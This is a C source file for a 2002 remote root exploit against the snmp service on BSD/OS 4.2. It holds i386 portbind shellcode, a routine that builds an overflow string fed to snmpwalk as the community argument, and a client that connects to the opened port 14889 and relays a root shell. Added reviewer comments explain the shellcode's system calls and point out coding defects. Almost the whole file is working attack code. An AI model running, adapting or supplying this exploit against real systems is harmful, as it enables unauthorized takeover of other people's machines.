/*
* 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit
*
* By: Safety and dekadish (Feb 2002)
*
*
* The #smile Crew
*
* Version: 0.1
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
//
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <fcntl.h>
#include <time.h>
#include <signal.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might
want to change it */
#define RETADDR 0x8045834
#define BUFLEN 260
#define NOP 0x90
/* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */
/*
 * shellkod - raw i386 machine code that fippla() places at the tail of the
 * overflow string. Reading the per-line assembly comments: the first two
 * pushes leave an 8-byte stub on the stack (0x9a ... 0xc3) and edi is pointed
 * at it, so each "call edi" below appears to enter the kernel through that
 * stub; the value loaded into al before each call selects the system call
 * (97, 104, 106, 30, 90, 59 -- consistent with the 4.4BSD numbering of
 * socket, bind, listen, accept, dup2, execve; not verified against BSD/OS 4.2
 * headers here). The "jns duploop" loop repeats dup2 while ebx counts down
 * from 2, and the last two dword pushes spell "/bin//sh" for the final call.
 * Net effect, as the file's own description states: listen on TCP port 0x3a29
 * and give the accepted connection a shell. None of the bytes is 0x00, which
 * matters because the string is later passed through execl() (see fippla()).
 */
char shellkod[] =
"\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh
"\xf7\xd0" // not eax
"\x50" // push eax
"\x31\xc0" // xor eax, eax
"\xb0\x9a" // mov al, 09ah
"\x50" // push eax
"\x89\xe7" // mov edi, esp
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\xb0\x61" // mov al, 97
"\xff\xd7" // call edi
"\x89\xc6" // mov esi, eax
"\x52" // push edx
"\x66\x68\x3a\x29" // push word 4135
"\x66\x53" // push bx
"\x89\xe5" // mov ebp, esp
"\x6a\x10" // push byte 16
"\x55" // push ebp
"\x56" // push esi
"\xb0\x68" // mov al, 104
"\xff\xd7" // call edi
"\xb0\x6a" // mov al, 106
"\xff\xd7" // call edi
"\x52" // push edx
"\x52" // push edx
"\x56" // push esi
"\xb0\x1e" // mov al, 30
"\xff\xd7" // call edi
"\x53" // push ebx
"\x50" // push eax
"\xb0\x5a" // mov al, 90
"\xff\xd7" // call edi
"\x4b" // dec ebx
"\x79\xf7" // jns duploop
"\x50" // push eax
"\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
"\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
"\x89\xe3" // mov ebx, esp
"\x50" // push eax
"\x54" // push esp
"\x53" // push ebx
"\xb0\x3b" // mov al, 59
"\xff\xd7";
// Overflow string built by fippla(), handed to snmpwalk by main(), freed in main().
char *buffer;
// Allocates and fills the global `buffer`; the char return value (always 1) is never used.
char fippla(u_long ret);
// Relays bytes between stdin/stdout and the TCP port the payload listens on; never returns.
int connect2shell(char *ip);
/*
 * Entry point. argv[1] is the target host. Builds the overflow string with
 * fippla(), runs snmpwalk against the host with that string as the value of
 * "-c" (presumably the community string; snmpwalk's option parsing is not
 * visible here), waits for snmpwalk to finish, then calls connect2shell().
 * Exits -1 on a usage error or a fork() failure.
 */
int main(int argc, char *argv[])
{
int ret; // wait status from waitpid(); filled in but never examined
pid_t pid;
fprintf(stderr, "%s\n", "[The #smile Crew]");
if (argc != 2)
{
fprintf(stderr, "Usage: %s <IP>\n\n", argv[0]);
exit(-1);
}
fippla(RETADDR); // allocates and fills the global `buffer`; return value ignored
pid = fork();
if (pid == -1)
{
fprintf(stderr, "fork() failed\n");
exit(-1);
}
if (!pid)
{
// Child. The argument list is terminated with a plain 0 rather than
// (char *)NULL, which is only portable where int and char * are the same size.
if(execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1)
{
fprintf(stderr, "Unable to run snmpwalk (correct path?)\n");
exit(-1);
}
}
else
waitpid(pid, &ret, 0); // Parent: block until snmpwalk exits; its status is not checked.
connect2shell(argv[1]);
free(buffer);
return; // NOTE(review): no value returned from an int main (constraint violation since C99)
}
/*
 * Build the BUFLEN (260) byte overflow string in the global `buffer`.
 * Layout as written by this function (len = strlen(shellkod)):
 *   [0, 116)        `ret` repeated little-endian; the loop steps by 4 while
 *                   i < 115, so the last store lands on index 115
 *   [116, 255-len)  NOP bytes (0x90), left over from the fill of indices 0..255
 *   [255-len, 255)  shellkod; index 255 keeps its NOP
 *   [256, 260)      never written
 * With RETADDR (0x08045834) no byte of the address, the NOP fill or shellkod
 * is 0x00 and nothing terminates the buffer, so the string later passed to
 * execl() runs on into whatever follows the allocation -- it relies on
 * uninitialized heap memory. malloc() is not checked. Returns 1; the caller
 * ignores it.
 */
char fippla(u_long ret)
{
int i;
buffer = (char *)malloc(BUFLEN);
for (i = 0; i < 256 ; i++)
*(buffer+i) = NOP;
// shellkod occupies [BUFLEN-5-len, BUFLEN-5)
memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod));
// overwrite the head of the NOP fill with the return address,
// one 32-bit little-endian word per iteration
for (i = 0; i < 115;)
{
buffer[i++] = (ret & 0xff);
buffer[i++] = (ret >> 8) & 0xff;
buffer[i++] = (ret >> 16) & 0xff;
buffer[i++] = (ret >> 24) & 0xff;
}
return(1);
}
/*
 * Connect to `ip` on TCP port 0x3a29 (14889 decimal) -- the port the payload
 * listens on -- send "id; uname -a", then relay bytes between stdin/stdout
 * and the socket until a read fails or the peer closes. Never returns: every
 * exit path calls exit(), so the free()/return at the bottom are unreachable.
 * Defects visible here: socket() is unchecked; `sock` is not zeroed (sin_zero,
 * and sin_len where the struct has one, stay uninitialized); `fds` is never
 * FD_ZERO'd, so the first select() sees whatever bits the stack held; the
 * return values of select() and write() are ignored.
 */
int connect2shell(char *ip)
{
char *buf;
fd_set fds;
int s, n, ret;
struct sockaddr_in sock;
sock.sin_family = AF_INET;
sock.sin_port = htons(0x3a29); // 14889 decimal
sock.sin_addr.s_addr = inet_addr(ip); // no check for INADDR_NONE on a malformed address
s = socket(AF_INET, SOCK_STREAM, 0);
ret = connect(s, (struct sockaddr *)&sock, sizeof(sock));
if (ret)
{
printf("Exploit failed\n");
exit(0);
}
else
printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n");
dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n"); // first commands sent to the remote side (BSD dprintf)
buf = (char *)malloc(512); // unchecked
memset(buf, 0, 512);
while (1)
{
// Both descriptors are re-armed on every pass; fds is never cleared.
FD_SET(0, &fds);
FD_SET(s, &fds);
select((s+1), &fds, 0, 0, 0); // no timeout; result unchecked
if (FD_ISSET(0, &fds))
{
n = read(0, buf, 511); // local input -> remote
if (n < 1)
{
fprintf(stderr, "read() error\n"); // also reached on plain EOF of stdin
exit(-1);
}
write(s, buf, n);
}
if (FD_ISSET(s, &fds))
{
n = read(s, buf, 511); // remote output -> local
if (n < 0)
{
fprintf(stderr, "read() error\n");
exit(-1);
}
else if (!n)
{
printf("Disconnected\n");
exit(0);
}
write(1, buf, n);
}
}
free(buf); // unreachable
return; // unreachable; also returns no value from an int function
}